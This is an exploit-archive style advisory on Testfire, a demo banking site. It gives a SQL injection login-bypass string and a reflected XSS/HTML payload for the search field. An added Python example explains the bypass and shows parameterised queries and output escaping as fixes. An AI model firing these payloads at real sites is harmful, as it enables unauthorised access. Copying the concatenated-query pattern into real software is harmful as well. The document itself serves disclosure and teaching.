Testfire suffers from cross site scripting and remote SQL injection vulnerabilities.
4b3e62267b096cf78ada551e91ef7aa85b23b24c3001df21d2245accace3d05c
# Exploit Title: Testfire Multiple Vulnerabilities
# Vendor: www.testfire.net
# Date: 22nd July, 2011
# Author: $#4d0\/\/[r007k17] a.k.a Raghavendra Karthik D (http://www.shadowrootkit.wordpress.com)
# Google Dork: Copyright © 2011, Watchfire Corporation
************************************************************
************************************************************
*****************************************************************
(Auth ByPass) SQLi Vulnerability
***************************************
{DEMO} : http://demo.testfire.net/bank/login.aspx
EXPLOIT:
Username: ' or 'bug'='bug
Password: ' or 'bug'='bug
Observe: Attackers can use this authentication bypass to get into the site's admin panel.
Reflected XSS Vulnerability
********************************
EXPLOIT 2: Reflected XSS (& HTML) Vulnerability (search field)
{Demo}: http://demo.testfire.net/search.aspx
Exploit: ">><marquee><h1><b><a href="http://www.google.com">BUG</a></b></h1></marquee>
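Added example, not part of the original advisory and not the application's own code: why the login input above defeats a concatenated query and why bound parameters and output encoding stop both issues. The schema, sample rows and function names are assumptions made for illustration.

```python
import html
import sqlite3

def make_db():
    # Constructed schema and rows; the advisory does not show the real tables.
    # Plaintext passwords only keep the demo short; store salted hashes in practice.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [("admin", "S3cret!", "admin"), ("jsmith", "demo1234", "user")])
    return db

def login_concat(db, username, password):
    """Assumed vulnerable pattern: input is pasted into the SQL text."""
    sql = ("SELECT username, role FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return db.execute(sql).fetchone()

def login_param(db, username, password):
    """Hardened: bound parameters are always data, never SQL syntax."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone()

def render_search(term, encode=True):
    """Echo the search term; encode=False mimics the reflected behaviour."""
    shown = html.escape(term, quote=True) if encode else term
    return "<p>Results for: " + shown + "</p>"

if __name__ == "__main__":
    db = make_db()
    bypass = "' or 'bug'='bug"  # input quoted from the advisory
    # Concatenated WHERE clause becomes:
    #   username = '' or 'bug'='bug' AND password = '' or 'bug'='bug'
    # AND binds tighter than OR, so the trailing 'bug'='bug' makes every row match.
    print("concatenated :", login_concat(db, bypass, bypass))
    print("parameterized:", login_param(db, bypass, bypass))
    print("real login   :", login_param(db, "jsmith", "demo1234"))
    markup = '"><marquee>BUG</marquee>'  # shortened form of the advisory's input
    print("raw echo     :", render_search(markup, encode=False))
    print("encoded echo :", render_search(markup))
```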
************************************************************
************************************************************
*****************************************************************
gr33t1ngs to s1d3 effects and my friends@!21/\/ _3lda@!3.14--
************************************************************
************************************************************
*****************************************************************